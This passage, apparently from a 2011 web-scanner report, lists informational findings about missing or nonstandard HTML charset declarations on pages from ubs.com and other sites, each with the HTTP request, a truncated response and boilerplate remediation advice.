GET /1/g/contact/order.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:18 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 51770
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="de">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.19. https://www2.ubs.com/1/i/contact/locations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/i/contact/locations.html

Request

GET /1/i/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:29 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35625
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="it">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.20. https://www2.ubs.com/1/ssl/e/contact/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/ssl/e/contact/contact.html

Request

GET /1/ssl/e/contact/contact.html?NavLB_Www=1309960260 HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; NavLB_Www=www2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:02 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 51634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.21. https://www2.ubs.com/6/e/contact/locations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /6/e/contact/locations.html

Request

GET /6/e/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:47 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 39163
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!--XSLT Template: XSLT for Accessibility/wb2xhtml_0.0.xslt--><!--XSLT extension functions: xalan--><!--Document language: en--><!--Acce
...[SNIP]...

20.22. https://www2.ubs.com/6/e/contact/order.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /6/e/contact/order.html

Request

GET /6/e/contact/order.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 52277
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 3
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!--XSLT Template: XSLT for Accessibility/wb2xhtml_0.0.xslt--><!--XSLT extension functions: xalan--><!--Document language: en--><!--Acce
...[SNIP]...

21. HTML does not specify charset
There are 14 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


21.1. http://seg.sharethis.com/socialOptimization.ps.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie9 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:03 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1396

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie9';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="str
...[SNIP]...

21.2. http://thezwsxp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: thezwsxp.com
Cookie: TestCookie=1

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:26:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

21.3. http://thezwsxp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: thezwsxp.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:19:34 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...

21.4. http://thezwsxp.com/img4/centralLanding.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /img4/centralLanding.css

Request

GET /img4/centralLanding.css HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Content-Length: 564
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...

21.5. http://thezwsxp.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /index.php

Request

GET /index.php HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

21.6. http://thezwsxp.com/index2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /index2.php

Request

GET /index2.php HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

21.7. http://thezwsxp.com/undefined

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /undefined

Request

GET /undefined HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: thezwsxp.com

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:24:39 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...

21.8. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://watson.microsoft.com
Path:   /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Request

GET /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm?LCID=1033&OS=6.1.7600.2.00030110.0.0.7.16385&SR6=0&SR5=0&SR4=0&SR3=0&SR2=0&SR1=2&SM=Xen&SPN=HVM%20domU&BV=3.4.2&MID=02B561F5-F97B-4B2F-ADF4-C485C85915EF HTTP/1.1
User-Agent: MSDW
Proxy-Connection: Keep-Alive
Host: watson.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 05 Jul 2011 06:05:21 GMT
Accept-Ranges: bytes
ETag: "0bcb385d93acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:18:13 GMT
Content-Length: 46

Bucket=1783942133
BucketTable=5
Response=1

21.9. http://www.ravenwoodfair.com/viximo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ravenwoodfair.com
Path:   /viximo

Request

GET /viximo HTTP/1.1
Host: www.ravenwoodfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.4
Date: Wed, 06 Jul 2011 14:06:04 GMT
p3p: CP="CAO PSA OUR"
content-type: text/html
location: https://graph.facebook.com/oauth/authorize?client_id=120563477996213&redirect_uri=http%3A//www.ravenwoodfair.com/viximoauth/post_auth/email_tg%253D1&scope=email
pragma: no-cache
cache-control: no-cache
Connection: close

<html><head></head><body><script type="text/javascript">top.location.href='https://graph.facebook.com/oauth/authorize?client_id=120563477996213&redirect_uri=http%3A//www.ravenwoodfair.com/viximoauth/p
...[SNIP]...

21.10. http://www.twitvid.com/player/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitvid.com
Path:   /player/

Request

GET /player/ HTTP/1.1
Host: www.twitvid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 06 Jul 2011 13:57:51 GMT
Content-Type: text/html
Content-Length: 311
Connection: close
Set-Cookie: SERVERID=sl2; path=/

<html>
<head>
<title>The page is not found</title>
<style>
body { font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body bgcolor="white" text="black">
<table width="100%" height="10
...[SNIP]...

21.11. http://www.ubs.com/1/e/index/siterating.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/index/siterating.html

Request

GET /1/e/index/siterating.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:55 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:54 GMT
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 10485
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>

<head>

<title></title>

<link
...[SNIP]...

21.12. http://www.ubs.com/2/e/quotes_help/ubsHelp.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /2/e/quotes_help/ubsHelp.htm

Request

GET /2/e/quotes_help/ubsHelp.htm HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:02 GMT
Server: Apache
Last-Modified: Wed, 22 Jun 2011 16:30:36 GMT
ETag: "1a75b-1700-7cf68300"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 5888
Content-Type: text/html
Connection: close

<!-- Patched ACE WebHelp Utility v2.0.0 -->
<!-- saved from url=(0014)about:internet -->
<html>
<head><script language="javascript">
<!--

function gkkCloser(time) {
   window.close();
}

func
...[SNIP]...

21.13. http://www.viddyou.com/get/v2_

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viddyou.com
Path:   /get/v2_

Request

GET /get/v2_ HTTP/1.1
Host: www.viddyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 18 Jan 2010 13:04:24 GMT
ETag: "66a82d5-9f-47d6ffe0dc600"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
   <title>*waves*</title>
</head>
<body>
   <a href="http://www.motionbox.com/">
       <img src="viddyou_goodbye.jpg" border="0" />
   </a>
</body>
</html>

21.14. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive8.com
Path:   /1245/Visitor/vTracker_v2.asp

Request

GET /1245/Visitor/vTracker_v2.asp?websiteid=0&groupid=1245 HTTP/1.1
Host: www.websitealive8.com
Proxy-Connection: keep-alive
Referer: http://www.metricstream.com/library/Library_5.jsp?prob=Compliance%20Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADASDBS=ANOCIOEDOGMMJDHEPBCFJNDG

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 7795
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

22. HTML uses unrecognised charset
There are 8 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


22.1. http://vut8rr7o.leoptic.com/index2.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vut8rr7o.leoptic.com
Path:   /index2.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /index2.php?q=dCeCluO2jbL5TVzBPtOVJ3CXfMv2mV6gaooPNthD7nda5xIn1QEMR1Zs591LuJScDEVcs9JSCZXQTTsOF&s=110 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vut8rr7o.leoptic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 16:05:22 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 806
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                       <html>
                        <head>
                        <meta http-equiv="content-type" content="text/html; charset=uft8">
                        <title>404 Not Fou
...[SNIP]...

22.2. http://www.tudou.com/v/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
   <meta http-equiv="Content-Language" content="zh-CN" />
...[SNIP]...

22.3. http://www.ubs.com/4/legal_disclaimer/jp_disclaimer.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/jp_disclaimer.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/jp_disclaimer.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Fri, 12 Mar 2010 08:56:42 GMT
ETag: "ba3d2-7c50-b5cc8680"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 31824
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=shift_jis" />
<!-- InstanceEndEditable -->
...[SNIP]...

22.4. http://www.ubs.com/4/legal_disclaimer/ko_privacy.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/ko_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/ko_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 09:51:32 GMT
ETag: "ba1ea-6d84-b3ed1100"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 28036
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr"/>
<!-- InstanceEndEditable -->
...[SNIP]...

22.5. http://www.ubs.com/4/legal_disclaimer/ru_privacy.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/ru_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/ru_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:01:14 GMT
ETag: "ba1f0-7ce7-d69dae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 31975
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-5" />
<!-- InstanceEndEditable -->
...[SNIP]...

22.6. http://www.ubs.com/4/legal_disclaimer/sc_chi_privacy.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/sc_chi_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/sc_chi_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:10:54 GMT
ETag: "ba1f6-655d-f92fc780"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 25949
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=GB2312"/>
<!-- InstanceEndEditable -->
...[SNIP]...

22.7. http://www.ubs.com/4/legal_disclaimer/tr_hk_privacy.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/tr_hk_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/tr_hk_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:16:18 GMT
ETag: "ba1fa-6d2b-c7fa080"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 27947
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=big5"/>
<!-- InstanceEndEditable -->
...[SNIP]...

22.8. http://www.ubs.com/4/legal_disclaimer/tr_tw_privacy.html

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/tr_tw_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/tr_tw_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:18:16 GMT
ETag: "ba1fd-65b6-13882a00"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 26038
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=big5"/>
<!-- InstanceEndEditable -->
